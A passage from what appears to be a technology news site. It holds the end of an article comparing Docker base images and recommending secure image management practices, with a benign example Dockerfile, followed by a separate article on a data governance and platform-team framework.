into the Popular Base Images Scratch Common use cases for the scratch base image include: Statically linked applications: Binaries (like those often produced by Go, Rust, or C/C++ when compiled appropriately) that bundle all their dependencies and don’t rely on external shared libraries from an OS.GraalVM native images: Java applications compiled ahead-of-time using GraalVM result in self-contained native executables. These executables bundle the necessary parts of the JVM and application code, allowing them to run directly on scratch without needing a separate JRE installation inside the container.Minimalist web servers/proxies: Lightweight servers like busybox httpd or custom-compiled web servers (e.g., Nginx compiled with static dependencies) can run on scratch. API Gateways like envoy or traefik can also be compiled statically for scratch.CLI tools and utilities: Standalone, statically compiled binaries like curl or ffmpeg, or custom data processing tools, can be packaged for portable execution. Full-Featured OS Distributions Sometimes, despite the benefits of minimalism, a traditional Linux environment is necessary. General-purpose base images provide full OS distributions. They come complete with familiar package managers (like apt, yum, or dnf), shells (like bash), and a wide array of standard tools. This makes them highly compatible with existing applications and simplifies dependency management for complex software stacks. Their ease of use and broad compatibility often make them a good choice for development or migrating legacy applications, despite their larger size. Here's a look at some popular options (Note: Data like download counts and sizes are approximate and intended for relative comparison): Ubuntu: A very popular, developer-friendly, general-purpose distribution with LTS options.Debian: Known for stability and minimalist defaults, forming the base for many other images.Red Hat UBI (Universal Base Image): RHEL-based images for enterprise use, focusing on compatibility and long-term support.Amazon Linux 2: Legacy AWS-optimized distribution based on older RHEL. Standard support ended June 30, 2023, with maintenance support until mid-2025.Amazon Linux 2023: Current AWS-optimized distribution with long-term support and modern features.CentOS: Historically popular RHEL clone, now primarily CentOS Stream (rolling release).Rocky Linux: Community RHEL-compatible distribution focused on stability as a CentOS alternative.AlmaLinux: Another community RHEL-compatible distribution providing a stable CentOS alternative.Oracle Linux: RHEL-compatible distribution from Oracle, often used in Oracle environments.openSUSE Leap: Stable, enterprise-focused distribution with ties to SUSE Linux Enterprise.Photon OS: Minimal, VMware-optimized distribution designed for container hosting and cloud-native apps.Fedora: Cutting-edge community distribution serving as the upstream for RHEL, ideal for developers wanting the latest features. Figure 1: Relative Popularity of Common Docker Base Images Based on Download Share. Truly Minimalist Bases Unlike images specifically stripped of standard tooling for security or runtime focus (covered next), these truly minimalist bases offer the smallest possible starting points. They range from an empty slate (scratch) requiring everything to be added manually, to highly compact Linux environments (like Alpine or BusyBox) where minimal size is the absolute priority. Alpine Linux Pros Extremely small size (~5–8MB) and resource-efficient; uses the simple apk package manager; fast boot times; inherently smaller attack surface; strong community support and widely available as variants. Cons Based on musl libc, potentially causing compatibility issues with glibc-dependent software (may require recompilation); lacks some standard tooling; potential DNS resolution edge cases, especially in Kubernetes clusters (though improved in recent versions - testing recommended). BusyBox Concept Provides a single binary containing stripped-down versions of many common Unix utilities. Pros Extremely tiny image size, often used as a foundation for other minimal images or in embedded systems. Cons Utilities have limited functionality. Not typically used directly for complex applications. Hardened Images This category includes images optimized for specific purposes. They often enhance security by removing standard OS components, provide tailored environments for specific languages/runtimes, focus on supply-chain security, or employ unique packaging philosophies. Wolfi (Chainguard) Concept Security-first, minimal glibc-based "undistribution". Pros Designed for zero known CVEs, includes SBOMs by default, uses apk, but offers glibc compatibility. Often excludes shell by default. Cons Newer ecosystem, package availability might be less extensive than major distributions initially. Alpaquita Linux (BellSoft) Concept Minimal distribution optimized for Java (often with Liberica JDK). Pros Offers both musl and glibc variants. Tuned for Java performance/security. Small footprint. Cons Primarily Java-focused, potentially less general-purpose. Smaller ecosystem. NixOS Concept Uses the Nix package manager for declarative, reproducible builds from configuration files. Pros Highly reproducible environments, strong isolation, easier rollbacks, and avoidance of dependency conflicts. Cons Steeper learning curve. Can lead to larger initial image sizes (though shared dependencies save space overall). Different filesystem/packaging approach. Specialized Images and Tools This subsection covers specialized images like Distroless/Chiseled and tools that abstract away Dockerfile creation. Distroless (Google) Concept Contains only the application and essential runtime dependencies. Pros Maximizes security by excluding shells, package managers, etc., drastically reducing the attack surface. Multiple variants available (base, java, python, etc.). Cons Debugging is harder without a shell (requires debug variants or other techniques). Unsuitable if the application needs OS tools. Ubuntu Chiseled Images (Canonical) Concept Stripped-down Ubuntu images using static analysis to remove unneeded components. Pros glibc compatibility and Ubuntu familiarity with reduced size/attack surface. No shell/package manager by default. Cons Less minimal than Distroless/scratch. The initial focus is primarily on .NET. Cloud Native Buildpacks (CNB) Concept A specification and toolchain (e.g., Paketo, Google Cloud Buildpacks) that transforms application source code into runnable OCI images without requiring a Dockerfile. Automatically detects language, selects appropriate base images (build/run), manages dependencies, and configures the runtime. Pros Eliminates Dockerfile maintenance; promotes standardization and best practices; handles base image patching/rebasing automatically; can produce optimized layers; integrates well with CI/CD and PaaS. Cons Can be complex to customize; less fine-grained control than Dockerfiles; initial build times might be longer; relies on buildpack detection logic. Jib (Google) Concept A tool (Maven/Gradle plugins) for building optimized Docker/OCI images for Java applications without a Docker daemon or Dockerfile. Separates dependencies, resources, and classes into distinct layers. Pros No Dockerfile needed for Java apps; doesn’t require Docker daemon (good for CI); fast, reproducible builds due to layering; often produces small images (defaults to Distroless); integrates directly into the build process. Cons Java-specific; less flexible than Dockerfiles for OS-level customization or multi-language apps; configuration managed via build plugins. Best Practices for Working With Base Images Introduction: Best Practices for Base Images at Scale Managing base images effectively is critical in large organizations. The strategies for creating, maintaining, and securing them directly influence stability, efficiency, and security across deployments. Vulnerabilities in base images propagate widely, creating significant risk. Implementing best practices throughout the image lifecycle is paramount for safe and effective containerization at scale. This section explores common approaches. Creation and Initial Configuration of Docker Base Images Approaches to creating base images vary. Large companies often balance using official images with building custom, minimal ones for enhanced control. Open-source projects typically prioritize reproducibility via in-repo Dockerfiles and CI/CD. Common initial configuration steps include installing only essential packages, establishing non-root users, setting environment variables/working directories, and using .dockerignore to minimize build context. Creation methods range from extending official images to building custom ones (using tools like Debootstrap or starting from scratch), depending on needs. Maintenance Processes and Update Strategies Maintaining base images is a continuous process of applying software updates and security patches. Best practices involve frequent, automated rebuilds using pinned base image versions for stability, often managed via CI/CD pipelines and tools like Renovate or Dependabot. This cycle includes monitoring for vulnerabilities, integrating security scanning (detailed further in the next section), and having a clear process to remediate findings (typically by updating the base or specific packages). For reproducibility, it’s strongly recommended to rebuild from an updated base image rather than running package manager upgrades (like apt-get upgrade) within Dockerfiles. Finally, a robust rollback strategy using versioned tags is crucial for handling potential issues introduced by updates. Integrating Vulnerability Scanning into the Lifecycle Integrating vulnerability scanning throughout the image lifecycle is essential for security. Various tools exist — integrated registry scanners, open-source options (like Trivy, Clair), and commercial platforms — which can be added to CI/CD pipelines. Best practice involves frequent, automated scanning (‘shifting left’): scan images on creation/push, continuously in registries, and during CI/CD builds. When vulnerabilities are found, remediation typically involves updating the base image or specific vulnerable packages. While managing scan accuracy (false positives/negatives) is a consideration, the use of Software Bills of Materials (SBOMs) is also growing, enhancing dependency visibility for better risk assessment. Figure 2: Vulnerability scan results (compiled by the author, April 2025) based on scans of the most recent image versions available via the Docker Hub API. Note that vulnerability counts change frequently. Supply Chain Security for Base Images Beyond scanning the final image, securing the base image supply chain itself is critical. A compromised base image can undermine the security of every container built upon it. Key practices include: Using trusted sources: Strongly prefer official images, images from verified publishers, or internally vetted and maintained base images. Avoid pulling images from unknown or unverified sources on public hubs due to risks like typosquatting or embedded malware.Verifying image integrity and provenance: Utilize mechanisms to ensure the image you pull is the one the publisher intended. Docker Content Trust (DCT) provides a basic level of signing. More modern approaches like Sigstore (using tools like cosign) offer more flexible and robust signing and verification, allowing you to confirm the image hasn't been tampered with and originated from the expected source.Leveraging Software Bill of Materials (SBOMs): As mentioned with Wolfi and scanning, SBOMs (in formats like SPDX or CycloneDX) are crucial. If your base image provider includes an SBOM, use it to understand all constituent components (OS packages, libraries) and their versions. This allows for more targeted vulnerability assessment and license compliance checks. Also, regularly generate SBOMs for your own application layers.Secure registries: Store internal or customized base images in private container registries with strong access controls and audit logging.Dependency analysis: Remember that the supply chain includes not just the OS base but also language-specific packages (like Maven, npm, PyPI dependencies) added on top. Use tools that analyze these dependencies for vulnerabilities as part of your build process. Content Inclusion and Exclusion in Base Images Deciding what goes into a base image involves balancing functionality with size and security. Typically included are minimal OS utilities, required language runtimes, and essential libraries (like glibc, CA certificates). Network tools (curl/wget) are sometimes debated. Key exclusions focus on reducing risk and size: development tools (use multi-stage builds), unnecessary system utilities, and sensitive information (inject at runtime). The goal is a tailored, consistent environment with minimal risk. Multi-stage builds are crucial for separating build-time needs. Importantly, ensure license compliance for all included software. Best Practices for Docker Base Image Management Effective base image management hinges on several best practices. Here’s a simple Dockerfile example illustrating some of them: Dockerfile # Use a specific, trusted base image version (e.g., Temurin JDK 21 on Ubuntu Jammy) # Practice: Pinning versions ensures reproducibility and avoids unexpected 'latest' changes. FROM eclipse-temurin:21-jdk-jammy # Metadata labels for tracking and management # Practice: Labels help organize and identify images. LABEL maintainer="Your Name <your.email@example.com>" \ description="Example Spring Boot application demonstrating Dockerfile best practices." \ version="1.0" # Create a non-root user and group for security # Practice: Running as non-root adheres to the principle of least privilege. RUN groupadd --system --gid 1001 appgroup && \ useradd --system --uid 1001 --gid appgroup --shell /usr/sbin/nologin appuser # Set the working directory WORKDIR /app # Copy the application artifact (e.g., JAR file) and set ownership # Practice: Copy only necessary artifacts. Ensure non-root user owns files. # Assumes the JAR is built separately (e.g., via multi-stage build or CI) COPY --chown=appuser:appgroup target/my-app-*.jar app.jar # Switch to the non-root user before running the application # Practice: Ensure the application process runs without root privileges. USER appuser # Expose the application port (optional but good practice for documentation) EXPOSE 8080 # Define the command to run the application # Practice: Aim for a single application process per container. ENTRYPOINT ["java", "-jar", "app.jar"] Note: This is a simplified example for illustration. Real-world Dockerfiles, especially those using multi-stage builds, can be significantly more complex depending on the application’s build process and requirements. Key techniques include: Security hardening involves running containers as non-root users (as shown above), limiting kernel capabilities, using read-only filesystems where possible, avoiding privileged mode, implementing network policies, verifying image authenticity with Docker Content Trust or Sigstore, and linting Dockerfiles (e.g., with Hadolint).Size minimization techniques include using minimal base images, employing multi-stage builds, optimizing Dockerfile instructions (like combining RUN commands), removing unnecessary files, and cleaning package manager caches after installations.Other key practices involve treating containers as ephemeral, aiming for a single process per container (as shown above), ensuring Dockerfile readability (e.g., sorting arguments, adding comments), leveraging the build cache effectively, using specific version tags or digests for base images (as shown in FROM), and using metadata labels (as shown above) for better image tracking and management. Design Patterns and Architectural Approaches Common design patterns guide base image creation, including starting minimal and adding layers (Base Image), tailoring for specific runtimes (language-specific), bundling application dependencies (application-centric), or standardizing on enterprise-wide ‘Golden Images’. Architectural approaches in large organizations often involve centralized teams managing hierarchical image structures (common base extended by specific images) using internal registries and defined promotion workflows. Optimizing reusability and layering involves structuring Dockerfiles carefully to maximize layer caching and creating reusable build stages. Roles and Responsibilities in Large Companies In large companies, managing base images involves shared responsibility. Platform/infrastructure teams typically build and maintain core images. Security teams define requirements, audit compliance, and assess risks. Development teams provide feedback and specific requirements. Governance is maintained through established policies, standards, and approval processes for new or modified images. Effective collaboration, communication, and feedback loops between these teams are crucial. Increasingly, a DevSecOps approach integrates security as a shared responsibility across all teams throughout the image lifecycle. Enforcing the Use of Standard Base Images Enforcement approaches differ: open-source projects often rely on guidance and community adoption, while large companies typically use stricter methods. Common enterprise enforcement techniques include restricting external images in registries, automated policy checks in CI/CD pipelines, providing internal catalogs of approved images, and using Kubernetes admission controllers. Key challenges involve potential developer resistance to restrictions and the overhead of maintaining an updated, comprehensive catalog. Successfully enforcing standards requires balancing technical controls with clear guidance, developer support, and demonstrating the benefits of consistency and security. Pros and Cons for Big Companies For large companies, standardizing base images offers significant pros, such as improved security through consistent patching, enhanced operational consistency, greater efficiency via reduced duplication and faster builds, and simplified compliance. However, there are cons: standardization can limit flexibility for specific application needs, create significant maintenance overhead for the standard images/catalog, pose migration challenges for existing applications, and potentially stifle innovation if it is too rigid. Therefore, organizations must carefully balance the benefits of standardization against the need for flexibility. Conclusion and Recommendations Effectively managing Docker base images is critical, emphasizing security, automation, and standardization throughout their lifecycle. Key recommendations include establishing dedicated ownership and clear policies/standards, implementing robust automation for the build/scan/update process, balancing standardization with developer needs through support, collaboration, well-maintained catalogs, and appropriate enforcement, and continuously monitoring and evaluating the overall strategy. A deliberate approach to base image management is essential for secure and efficient containerization. Author’s note: AI was utilized as a tool to augment the research, structuring, and refinement process for this post. Final Thoughts Choosing and managing Docker base images is far more than just the first line in a Dockerfile; it’s a foundational decision that echoes throughout your containerization strategy. From security posture and performance efficiency to maintenance overhead and compliance, the right base image and robust management practices are crucial for building reliable, secure, and scalable applications. By applying the principles and practices outlined here — understanding the trade-offs, implementing automation, fostering collaboration, and staying vigilant about security — you can harness the full potential of containers while mitigating the inherent risks. Make base image management a deliberate and ongoing part of your development lifecycle.

By Istvan Foldhazi

From Fragmentation to Focus: A Data-First, Team-First Framework for Platform-Driven Organizations

Success in today's complex, engineering-led enterprise organizations, where autonomy and scalability are paramount, hinges on more than adopting the latest tools or methodologies. The real challenge lies in aligning decentralized teams with shared goals while embedding governance without stifling innovation, creating a framework where teams can innovate freely, stay aligned, and ensure data is no longer treated as a second-class citizen. While CI/CD revolutionized software development, it overlooked the unique challenges of managing and governing data at scale. Data pipelines, quality, and compliance often remain fragmented, manual, or inconsistent, creating bottlenecks and risks. Enter Continuous Governance (CG): the evolution that puts data on equal footing with software, embedding compliance, quality, and automation directly into workflows without stifling creativity. This article introduces a Data-First, Team-First approach, a blueprint for organizations to elevate data to a first-class citizen while empowering teams to innovate with autonomy. Guided by principles like Conway's Law, Team Topologies, Golden Paths, and Recipes, it discusses transforming fragmented workflows into a seamless, high-performing ecosystem. “However, achieving this balance of innovation and governance is no small feat in today’s decentralized organizations.” “In my previous article, "Data-First IDP: Driving AI Innovation in Developer Platforms" we explored the importance of aligning team autonomy with data governance and introduced foundational concepts like Golden Paths and Continuous Governance. This article builds on those principles to present a comprehensive Data-First, Team-First framework.” The Cost of Fragmentation in Decentralized Organizations Decentralized teams, each managing their own workflows, tools, and data pipelines, often operate like independent islands within an organization. This autonomy fosters innovation but frequently comes at a cost: fragmented systems, duplicated efforts, and governance gaps. Traditional governance frameworks built around static, document-based policies struggle to keep up with the dynamic needs of such environments. Reliance on manual oversight slows teams down and introduces friction and internal politics, turning governance into a roadblock rather than an enabler. Teams are left with a choice: bypass cumbersome processes or become paralyzed by bureaucratic delays. Inconsistent Governance: Teams may interpret compliance or quality standards differently, leading to risks and inefficiencies.Duplication of Effort: Similar pipelines, tools, and workflows are built repeatedly, wasting time and resources.High Cognitive Load: Developers and engineers grapple with complex tooling and siloed processes, detracting from their core tasks.Lack of Interoperability: Cross-team collaboration becomes a bottleneck without shared language or standards. How can such an organization balance the freedom of individual teams with the need for alignment and governance at scale? Shifting from Fragmentation to Alignment Organizations can address these challenges by introducing Recipes—parameterized scripts that automate and operationalize workflows for deploying resources, updating metadata, and enforcing compliance. Unlike static, document-based policies, Recipes embed governance and quality directly into workflows, ensuring consistent implementation across decentralized teams. By standardizing key tasks such as pipeline deployment and metadata validation, Recipes eliminate duplication of effort, reduce cognitive load, and ensure interoperability through vendor-neutral syntax like Score. Teams can work faster and more confidently, knowing compliance is built into the process without adding friction or delays. Imagine a decentralized organization where each team leverages Recipes to enforce repository standards, maintain lineage tracking, and inject metadata into shared catalogues. The result? Fragmentation gives way to alignment, enabling teams to innovate autonomously while remaining connected through scalable, repeatable workflows. Data-First: Embedding Governance and Quality at the Core Metadata Inflow: Ensure that data products are enriched with lineage, quality metrics, and compliance attributes as they are created. This shared metadata forms the foundation for interoperability and cross-team collaboration, ensuring data products can integrate seamlessly across the organization.Data Products as Code (DPaC): Define data products declaratively, applying the principles of Everything as Code to data workflows. Policy as Code (PaC) consistently and automatically enforces governance, quality, and compliance rules. This approach reduces errors and enhances scalability by eliminating reliance on manual governance processes.Golden Paths: (Templates) Predefined, opinionated workflows within the Internal Developer Platform (IDP) guide teams through compliant and optimized practices. These workflows embed Policy as Code (PaC) into every step, ensuring governance and validation are automated and consistent. By abstracting complexity, Golden Paths enable teams to execute workflows with confidence and focus on innovation.Recipes: Parameterized scripts automate key tasks like resource deployment, metadata validation, and repository configuration. Acting as the building blocks of Templates, Recipes ensure repeatability and reduce duplication of effort. By adopting vendor-neutral syntax (e.g., Score), Recipes provide portability and scalability across tools and teams. Recipes also integrate Policy as Code, ensuring compliance and governance are enforced directly within the scripts. Team-First: Empowering Teams with Autonomy Stream-Aligned Teams: Assign ownership of specific data products to domain-focused teams. This ensures that teams deliver value independently while adhering to organizational governance standards.Self-Service Platforms: Provide intuitive tools, templates, and workflows via an IDP. These platforms abstract complexity and enable teams to work autonomously without deep governance expertise.Golden Paths for Teams: Empower teams with simplified, pre-configured workflows that embed compliance and governance directly into their pipelines. Golden Paths allows teams to focus on innovation while aligning with organizational goals. Continuous Governance (CG): The Engine of Computational Governance A New Service in the Integration and Delivery Plane At the heart of CG lies a dedicated service within the Integration & Delivery Plane of the IDP. This service performs computational governance checks as a critical step before workflows proceed to the Continuous Delivery (CD) function. By embedding these automated checks (PaC) directly into the pipeline, CG ensures that governance, compliance, and quality standards are met without introducing manual bottlenecks. Golden Paths and Computational Governance Golden Paths are opinionated workflows designed to streamline compliance and optimize practices. These paths integrate directly with the CG service, ensuring that every action adheres to organizational governance policies. Before deployment, the CG service validates key governance attributes, such as: Metadata Compliance: Ensures lineage, quality metrics, and regulatory attributes are included and adhere to organizational standards.Policy Enforcement: Validates that pipelines and resources align with access control, naming conventions, and compliance requirements.Quality Assurance: Checks for predefined thresholds in data quality, ensuring the output meets expected standards. Recipes as Enablers of Computational Governance Recipes are parameterized scripts that operationalize specific tasks within the Golden Path. While Recipes help enforce governance during pipeline execution, their integration with the CG service ensures: Embedding Brownfield Services with Recipes: Recipes can help integrate existing brownfield services into new workflows by automating tasks such as resource discovery, compliance validation, and metadata enrichment. By standardizing these processes with vendor-neutral syntax, Recipes enable organizations to utilize legacy systems while aligning them with modern governance and operational standards. This approach simplifies migration challenges and supports incremental modernization without disrupting current operations. Automated Validation: Recipes are executed only if they pass CG checks, embedding compliance into every process step.Seamless Workflows: Teams can focus on delivering value while the CG service consistently applies governance standards. The Impact of Computational Governance By introducing a CG service within the Integration & Delivery Plane, organizations gain: Automated Compliance: Governance checks are built into the pipeline, removing manual oversight and reducing delays.Improved Quality Assurance: Issues are detected and addressed before the CD function, ensuring reliable and compliant outputs.Frictionless Innovation: Teams can innovate freely, knowing compliance is embedded in workflows without requiring manual intervention. The Central Enabling Team: The Glue That Holds It All Together In a Data-First, Team-First framework, decentralized stream-aligned teams focus on delivering domain-specific data products, and platform teams provide self-service infrastructure. However, a Central Enabling Team is necessary to ensure cohesion and scalability across the organization. This team acts as the glue, enabling alignment between decentralized teams while maintaining organizational standards, governance, and platform capabilities. The Mission of the Central Enabling Team The Central Enabling Team's mission is to: Scale and Maintain Platform Capabilities: Develop and sustain crosscutting services such as the IDP, CG, and the DevEx Plane. These services ensure compliance by embedding governance and quality into workflows without burdening individual teams.Support, Not Control: Act as an enabler by facilitating the adoption of templates, Golden Paths, and Recipes, reducing the complexity teams face without constraining their autonomy.Reduce Cognitive Load Across Teams: Provide automated validation and feedback mechanisms to simplify governance, compliance, and operational tasks. This allows teams to focus on innovation while the platform seamlessly handles governance.Standardize for Interoperability: Establish and enforce consistent standards for metadata, Recipes, and governance policies, enabling teams to collaborate effectively and scale efficiently. Key Responsibilities The Central Enabling Team is a custodian and guide for key organizational resources, ensuring consistency, compliance, and usability. However, ownership of these resources remains with the teams that create and maintain them. The Central Enabling Team supports by: Building and Managing the IDP: Develop core features like the DevEx Plane, Golden Paths, and self-service tools. These tools abstract complexity and provide developers with guided workflows, enabling them to work autonomously while adhering to governance requirements.Operationalizing Governance: Automate compliance checks and policy enforcement through Policy as Code (PaC) and CG services. These validations ensure that governance is seamlessly embedded into workflows, reducing manual intervention and delays.Reducing Friction with Continuous Governance: Implement CG services within the IDP's Integration & Delivery Plane to validate compliance, metadata quality, and organizational standards before deployment. This reduces teams' cognitive overhead, allowing them to focus on delivering domain-specific value.Maintaining Shared Resources: Guiding Compliance: Collaborating with stream-aligned teams to ensure that Recipes, templates, and metadata resources meet organizational standards. The Central Enabling Team provides validation and guidance rather than enforcing direct control.·Facilitating Shared Standards: Establishing and maintaining organizational standards for metadata, templates, and repositories, ensuring all teams can easily align their resources with these guidelines.Supporting Maintenance: Assisting teams in improving or validating their scripts, templates, and workflows to ensure long-term interoperability and scalability. The Central Enabling Team offers support to refine and adapt these resources without taking ownership.Facilitating Team Adoption: Collaborate with stream-aligned teams to onboard them to platform tools, troubleshoot challenges, and improve the adoption of governance and best practices.Collaborative and Automation-Focused: Enabler, Not a Gatekeeper: Unlike traditional centralized teams, the Central Enabling Team empowers stream-aligned teams by providing resources and guidance rather than controlling workflows.Automation-driven: Automates repetitive tasks like compliance validation and resource provisioning, enabling teams to focus on innovation.Collaborative: Works closely with teams to co-create solutions that align with their specific domain needs while adhering to organizational standards. Practical Example In a retail organization: The Central Enabling Team provides pre-built Golden Paths for workflows such as data ingestion or transformation, ensuring governance and metadata standards are embedded by design.It helps the Sales Data Team implement Recipes for deploying resources and updating metadata, ensuring compliance with organizational policies.It maintains the metadata catalogue, enabling all teams to discover and integrate data products seamlessly. By serving as enablers rather than gatekeepers, the Central Enabling Team ensures that decentralized teams have the tools, resources, and support they need to innovate while maintaining alignment with organizational goals. Conway's Law: Structuring for Success Craig Larman's presentation, "Myths of Software Management: Conway's Law," provided an invaluable gateway into revisiting Melvin Conway's original insights. Larman draws attention to a critical section at the end of Conway's 1968 paper, where Conway makes a striking recommendation that directly challenges the common interpretation of his law. Conway's Law: "Organizations which design systems … are constrained to produce designs which are copies of the communication structures of these organizations." This is frequently interpreted as a call to align team structures with the desired architecture. However, as Larman highlights, Conway's concluding thoughts suggest a far more nuanced view: The architecture you choose first is likely to be wrong.Organizations should ensure their teams are structured to adapt to evolving architectures, not constrained by them. This foundational idea, highlighted but often overlooked in Conway's writing, reframes the relationship between teams and architecture. Conway advises focusing on flexibility in systems and structures instead of forcing teams to stick to a set design. This approach allows for ongoing improvements and adaptations as needs change. The True Insight: Adaptability Over Alignment This recommendation aligns with the principles of the Inverse Conway Maneuvre, which flips the common interpretation of Conway's Law. Instead of forcing teams to fit a predetermined architecture, it advocates for architectures that adapt to autonomous teams' natural interactions and workflows. By acknowledging that initial architectural designs are rarely perfect, Conway emphasizes the need for: Teams capable of adapting as architectural requirements evolve.Architectures designed to emerge from iterative collaboration rather than rigid, upfront definitions. Embedding Conway's Insight in Practice In this article, I advocate for a Data-First, Team-First Framework that operationalizes this principle through tools like Golden Paths, Recipes, and a Central Enabling Team. This approach ensures adaptability while maintaining governance at scale: 1. Golden Paths for Consistent Flexibility: Golden Paths serve as predefined workflows that standardise best practices without limiting innovation. By embedding governance directly into these workflows, teams can adapt them to domain-specific needs while ensuring compliance. 2. Recipes as Modular Building Blocks: Recipes (parameterized scripts) for tasks like resource provisioning or metadata validation allow teams to evolve workflows dynamically. This modular approach ensures that changes in architecture can be reflected in team processes without disrupting governance or alignment. 3. The Central Enabling Team as a Catalyst for Change: The Central Enabling Team acts as a facilitator rather than enforcing rigid controls. It supports teams with templates, tools, and guidance, enabling them to adjust workflows and architectures as needs change. This ensures cohesion and scalability across the organization without compromising autonomy. A Practical Example: Retail Transformation Consider a retail organization struggling with fragmented pipelines and siloed teams. Applying Conway's recommendation for flexibility, the organization: Redesigns its IDP around domain boundaries, enabling teams to structure their workflows around specific needs.Deploys Golden Paths for standardized, compliant data ingestion, ensuring governance and adaptability.Uses Recipes to automate governance checks, metadata updates, and resource provisioning, reducing manual effort and duplication. This allows teams to innovate within a framework, ensuring consistency and alignment and reflecting Conway's vision of adaptable systems and team structures. From Fragmentation to Focus: The Impact Conway's recommendations highlight a critical challenge for modern organizations: the systems we design today will evolve, and teams and architectures must be prepared to grow with them. This vision underpins the Data-First, Team-First Framework, where adaptability is embedded through: Continuous Governance (CG): Automating compliance and quality assurance to minimize friction as systems change.Self-Service Platforms: Enabling teams to innovate autonomously while staying aligned with organizational standards. Conway's insights remain as relevant as ever as we navigate the complexities of decentralized organizations. The question isn't whether your teams align with your architecture; it's whether your teams and systems are flexible enough to adapt to the architecture of tomorrow. Interoperability at Scale: Shared metadata and governance policies are implemented consistently through Golden Paths and recipes.Faster Innovation: Teams can leverage pre-built Golden Paths and Recipes, accelerating the deployment of compliant and scalable services.Stronger Governance: Automated workflows ensure all resources, metadata updates, and repositories meet organizational standards.Aligned Autonomy: Teams innovate independently while adhering to shared standards, supported by workflows that embed governance and quality at every stage. The DevEx Plane: Empowering Developers The Developer Experience (DevEx) Plane is the linchpin of the Data-First, Team-First framework, providing a streamlined interface for interacting with the platform. By reducing cognitive load, enabling autonomy, and seamlessly embedding governance, the DevEx Plane empowers developers to innovate without sacrificing compliance or efficiency. Simplifying Complexity Through Self-Service The DevEx Plane abstracts away the complexities of infrastructure, governance, and compliance, providing developers with intuitive, self-service workflows that streamline their efforts. Key features include: Self-Service Workflows: Developers can select predefined Golden Paths to implement compliant, scalable services like data ingestion or transformation pipelines, ensuring they adhere to organizational standards without needing deep governance expertise.Direct Feedback: Continuous validation ensures developers comply with metadata, lineage, and governance rules as they work, catching issues early and preventing costly downstream errors.Unified Tools: The DevEx Plane eliminates tool sprawl and provides a cohesive user experience by centralizing activities such as deploying pipelines, updating metadata catalogues, and managing resources within a single interface. A data engineer creating a streaming ingestion pipeline can use the DevEx Plane to select a Golden Path, deploy resources through parameterized Recipes, and automatically inject metadata into the organizational catalogue(s), all without involving additional teams. They are also free to build their own template, which utilizes existing Recipes, and they can even develop their own. A Clarification - Golden Paths and Templates: Balancing Best Practices and Autonomy Golden Paths and Templates offer teams a choice between following pre-approved patterns or defining their own workflows. Both approaches rely on Recipes, the foundational building blocks that automate compliance and governance. As a review: Golden Paths: Opinionated, best-practice workflows that guide teams through compliant, optimized processes. Golden Paths embed governance and validation into every step, ensuring teams follow organizational standards with minimal friction.Templates: Customizable workflows created by teams to address specific domain requirements. Templates give teams autonomy to innovate while ensuring that all processes adhere to governance rules through embedded Recipes.Recipes: Parameterized scripts that automate individual tasks such as resource provisioning, compliance validation, and metadata updates. Recipes ensure consistency and repeatability in both Golden Paths and Templates. This Recipe-driven framework allows teams to innovate while maintaining organizational alignment, enabling autonomy and governance at scale. Embedding Governance Without Friction Governance, often seen as a barrier to speed, becomes a seamless part of development workflows within the DevEx Plane. By automating governance, the platform removes human bottlenecks and ensures consistent enforcement at every step. Recipes as Operational Scripts: Recipes, accessible via the DevEx Plane, execute tasks such as provisioning resources, updating metadata, configuring repositories, and embedding governance rules directly into workflows.Continuous Compliance Checks: Developers receive real-time feedback if a pipeline or resource violates organizational standards, enabling them to address issues immediately without slowing development. Scaling Autonomy and Collaboration In large, decentralized organizations, the DevEx Plane is the connective tissue that ensures consistency across teams while empowering them to operate autonomously. It achieves this by embedding governance and compliance into automated workflows and providing tools that streamline development processes. Key benefits include: Aligned Autonomy: Teams can innovate within their domains while relying on the DevEx Plane to enforce governance, compliance, and organizational standards. By offering predefined workflows, templates, and Recipes, the platform enables teams to focus on their core objectives without worrying about the complexities of compliance.Transparency and Traceability: The DevEx Plane supports automating governance features, enabling lineage tracking, compliance validation, and quality metric integration into workflows. It doesn’t directly provide these attributes but ensures that all automated processes incorporate them. By embedding these features into workflows, the platform fosters accountability and trust across teams, ensuring that governance and compliance are achieved by design. From Fragmentation to Focus Aligning autonomy with governance is a delicate balance in large, decentralized organizations. The Data-First, Team-First framework—enabled by IDPs, guided by Inverse Conway Maneuver, and operationalized through Golden Paths and Recipes— provides a clear path forward. Organizations can unlock their data's and people's full potential by embedding governance through Continuous Governance (CG), empowering teams with self-service tools, and reducing cognitive load through the DevEx Plane. The result? Accelerated innovation at scale, supported by a foundation of trust, compliance, and collaboration. This article references concepts found in: Skelton, M., & Pais, M. (2019). Team Topologies: Organizing Business and Technology Teams for Fast Flow. IT Revolution Press. Fowler, M. (n.d.). Conway's Law. Retrieved from https://martinfowler.com/bliki/ConwaysLaw.html

By Paul Gale

Coding

Functions of Coding

Frameworks

Java

JavaScript

Languages

Tools

DZone's Featured Coding Resources

The Latest Coding Topics